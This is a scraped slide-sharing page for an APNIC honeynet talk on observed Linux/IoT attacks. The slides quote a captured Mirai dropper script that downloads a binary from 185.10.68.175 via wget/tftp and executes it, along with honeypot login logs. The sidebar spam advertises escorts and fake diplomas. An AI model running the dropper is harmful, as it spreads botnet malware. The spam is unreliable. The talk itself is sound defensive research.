IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...APNIC
 
2015_01 - Networking Session - SPHMMC ICT workshop
2015_01 - Networking Session - SPHMMC ICT workshop2015_01 - Networking Session - SPHMMC ICT workshop
2015_01 - Networking Session - SPHMMC ICT workshopKathleen Ludewig Omollo
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdwebuploader
 
Palo Alto Networks Sponsor Session
Palo Alto Networks Sponsor SessionPalo Alto Networks Sponsor Session
Palo Alto Networks Sponsor SessionSplunk
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones HijackingPriyanka Aash
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
 
RenasCON 2023: Learning from honeypots
RenasCON 2023: Learning from honeypotsRenasCON 2023: Learning from honeypots
RenasCON 2023: Learning from honeypotsAPNIC
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat Security Conference
 
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network SecurityMMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network SecurityAPNIC
 

Similar to IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project (20)

Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wire
 
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014
 
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
 
2015_01 - Networking Session - SPHMMC ICT workshop
2015_01 - Networking Session - SPHMMC ICT workshop2015_01 - Networking Session - SPHMMC ICT workshop
2015_01 - Networking Session - SPHMMC ICT workshop
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
 
Palo Alto Networks Sponsor Session
Palo Alto Networks Sponsor SessionPalo Alto Networks Sponsor Session
Palo Alto Networks Sponsor Session
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones Hijacking
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
RenasCON 2023: Learning from honeypots
RenasCON 2023: Learning from honeypotsRenasCON 2023: Learning from honeypots
RenasCON 2023: Learning from honeypots
 
No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
 
FreeBSD and Hardening Web Server
FreeBSD and Hardening Web ServerFreeBSD and Hardening Web Server
FreeBSD and Hardening Web Server
 
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network SecurityMMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
 

More from APNIC

IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119APNIC
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119APNIC
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119APNIC
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119APNIC
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119APNIC
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...APNIC
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonAPNIC
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonAPNIC
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPNIC
 
Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6APNIC
 
AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!APNIC
 
CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023APNIC
 
AFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet developmentAFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet developmentAPNIC
 
AFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment StatusAFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment StatusAPNIC
 
AFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressingAFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressingAPNIC
 
AFSIG 2023: APNIC - Registry & Development
AFSIG 2023: APNIC - Registry & DevelopmentAFSIG 2023: APNIC - Registry & Development
AFSIG 2023: APNIC - Registry & DevelopmentAPNIC
 
Afghanistan IGF 2023: The ABCs and importance of cybersecurity
Afghanistan IGF 2023: The ABCs and importance of cybersecurityAfghanistan IGF 2023: The ABCs and importance of cybersecurity
Afghanistan IGF 2023: The ABCs and importance of cybersecurityAPNIC
 
IDNIC OPM 2023: IPv6 deployment planning and security considerations
IDNIC OPM 2023: IPv6 deployment planning and security considerationsIDNIC OPM 2023: IPv6 deployment planning and security considerations
IDNIC OPM 2023: IPv6 deployment planning and security considerationsAPNIC
 
IDNIC OPM 2023 - Internet Number Registry System
IDNIC OPM 2023 - Internet Number Registry SystemIDNIC OPM 2023 - Internet Number Registry System
IDNIC OPM 2023 - Internet Number Registry SystemAPNIC
 

More from APNIC (20)

IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
 
Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6
 
AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!
 
CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023
 
AFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet developmentAFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet development
 
AFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment StatusAFNOG 1: Afghanistan IP Deployment Status
AFNOG 1: Afghanistan IP Deployment Status
 
AFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressingAFSIG 2023: Internet routing and addressing
AFSIG 2023: Internet routing and addressing
 
AFSIG 2023: APNIC - Registry & Development
AFSIG 2023: APNIC - Registry & DevelopmentAFSIG 2023: APNIC - Registry & Development
AFSIG 2023: APNIC - Registry & Development
 
Afghanistan IGF 2023: The ABCs and importance of cybersecurity
Afghanistan IGF 2023: The ABCs and importance of cybersecurityAfghanistan IGF 2023: The ABCs and importance of cybersecurity
Afghanistan IGF 2023: The ABCs and importance of cybersecurity
 
IDNIC OPM 2023: IPv6 deployment planning and security considerations
IDNIC OPM 2023: IPv6 deployment planning and security considerationsIDNIC OPM 2023: IPv6 deployment planning and security considerations
IDNIC OPM 2023: IPv6 deployment planning and security considerations
 
IDNIC OPM 2023 - Internet Number Registry System
IDNIC OPM 2023 - Internet Number Registry SystemIDNIC OPM 2023 - Internet Number Registry System
IDNIC OPM 2023 - Internet Number Registry System
 

Recently uploaded

Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一Fs
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxeditsforyah
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMartaLoveguard
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Excelmac1
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 

Recently uploaded (20)

Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptx
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptx
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 

IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project

  • 1. 1 Observations and Lessons Learned from the APNIC Community Honeynet Project Adli Wahid Senior Internet Security Specialist, APNIC adli@apnic.net
  • 2. 2 2 Let’s Connect! LinkedIn: Adli Wahid Email: adli@apnic.net Twitter: @adliwahid PGP Key fingerprint = 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
  • 3. 3 3 Talk Overview 1. APNIC Community Honeynet Project 2. Observations on activities targeting Linux servers and IoTs 3. Lessons Learned / Reflections
  • 4. 4 4 Overview of the APNIC Community Honeynet Project
  • 5. 5 5 APNIC Community Honeynet Project • Context – Educational – using honeypots for understanding network security attacks / threats, part of our network security training – Situational awareness, the bigger picture, cooperation with other stakeholders, tools (i.e. MISP threat sharing platform, Wireshark, Suricata, etc ) • Collaboration – Partners deploy honeypots, APNIC runs the backend – Information collected among partners & threat sharing* • Outcomes – More than 50 distributed honeypots* in AP region since 2017 – Share threat information for APNIC members, partners (i.e CERTs/CSIRTs, Network Operators) • https://blog.apnic.net/2020/07/09/apnic-community-honeynet-project-behind- the-scenes/ • https://dash.apnic.net 5
  • 6. 6 6 APNIC Community Honeypot 1. Purpose and Placement o Research & Alerting – Internet 2. Type of Honeypots o Cowrie, Dionaea, RDPHoney, 3. Deployment – Community Honey Network (fork of Modern Honey Network) – Partners & Self Hosting 4. Data Collection & Analysis & Action – Logs, Visualization, Alert, Action (Incident Response) – Elasticsearch, Kibana, Logstash, Beats – Suricata IDS – ElastAlert + Slack 5. Maintenance – Ansible – LibreNMS Detection with Suricata Rulesets Slack Alert
  • 7. 7 7 Community Honeynet Infrastructure hpfeeds hpfeeds CHN MHN Filebeats (json) Filebeats (json) Logstash TLS TLS ElasticSear ch BigQuery Elastalert Kibana honeypots Distributed honeypots MHN – Modern Honey Network CHN – Community HoneyNetwork
  • 8. 8 8 * Traffic from the last 30 days
  • 9. 9 9
  • 10. 10 10
  • 11. 11 Country View – Pakistan (Last 90 days)
  • 13. 13 13 Linux/Unix Malware • Routers / IoT devices / Servers run Linux / Unix based OS • Not new but pervasive – Targets are exposed on the Internet (http, telnet, ssh) – Unpatched / Unmonitored (i.e. no Anti Virus, firmware upgrades not applied) – Default/Weak credentials • Popular example – Mirai (ddos agent) – Source code was shared publicly – Many variants – josho, owari, masuta, sora etc – Gafgyt • Simple technique of infecting and spreading & persistence • Interesting Scenarios – Working from Home – Servers / Hosting / Cloud
  • 14. 14 14 Different Perspectives of a DDoS My Network / Infrastructure / Host Source Target / Victim Perspective Attacker Perspective x
  • 15. 15 15 Service & Attacker Infrastructure • Setting up the infrastructure • Misconfigured services – Servers - NTP, DNS, SSDP, etc – Amplification attack – Spoof source of request – https://stats.cybergreen.net/ – https://www.shadowserver.org/what-we- do/network-reporting/get-reports • Active bot “recruitment” – Internet exposed services – Vulnerable devices – Weak credentials
  • 16. 18 18 source Brute force: Username: admin password:12345 Remote Code Execution via Web interface Download Binary / Execute Scan and gain access Connect to Command and Control C & C “Recruitment Process” wget http://37.x.2x.190:80/13747243572475/hx86_64 2 1 Attacker
  • 17. 19 19 Telnet/SSH Honeypot (Cowrie) • Emulates SSH / Telnet – Allows attacker to log in • Emulates Linux/Unix environment – Captures command issued by attacker after login – Including download • ”Look and Feel” of Linux/Unix server and IoT devices • Attract certain class of attacks – Scan for SSH/Telnet – Bruteforce username/password – Login & execute payload(s) • Ddos Agents & Cryptominers – Based on post-login activities and binary collected Mirai sample – 2016
  • 18. 20 Successful Logins – New Honeypot { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:50.568233Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "123.b.c.12", "session": "fd7977b0b54a", "password": "taZz@23495859", "sensor": "mn-001" } { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:59.378766Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "80.x.y.62", "session": "fdcd399b1282", "password": "taZz@23495859", "sensor": "mn-001" } Check out: https://www.bankinfosecurity.com/botnets-keep-brute-forcing-internet-things-devices-a-
  • 19. 21 21 Execute Payload #!/bin/sh cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt || cd /root || cd / wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; busybox wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; tftp -r mirai.mips -g 185.10.68.175; busybox tftp -r mirai.mips -g 185.10.68.175; chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips
